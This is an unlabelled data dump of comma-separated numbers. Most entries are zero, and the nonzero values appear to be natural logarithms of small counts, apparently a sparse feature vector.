0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 2.8903717578961645, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.605170185988092, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 3.713572066704308, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.028278520230698, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7369991058576035, 0, 0.0, 0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 8.266085260861173, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.8971538676367405, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 2.3978952727983707, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.465908118654584, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.475339236566737, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 7.052721049232323, 0.0, 0.0, 0, 0, 3.93848385770662, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 1.3862943611198906, 0.0, 3.5553480614894135, 5.723585101952381, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.828641396489095, 0.0, 4.74493212836325, 0.0, 0.0, 3.4011973816621555, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.791759469228055, 0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 5.95562797505323, 0.0, 0, 0.0, 11.851968999389458, 0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 1.9459101490553132, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 4.356708826689592, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.302585092994046, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 3.4011973816621555, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.9384838577066197, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.908694592507015, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.828641396489095, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.70805020110221, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.3322045101752034, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 18.568604526672758, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 13.031161839818749, 0.0, 0.0, 12.949565591960841, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.626454784082686, 0.0, 0.0, 0.0, 5.346437018291705, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.8398715690385097, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.278114659230517, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 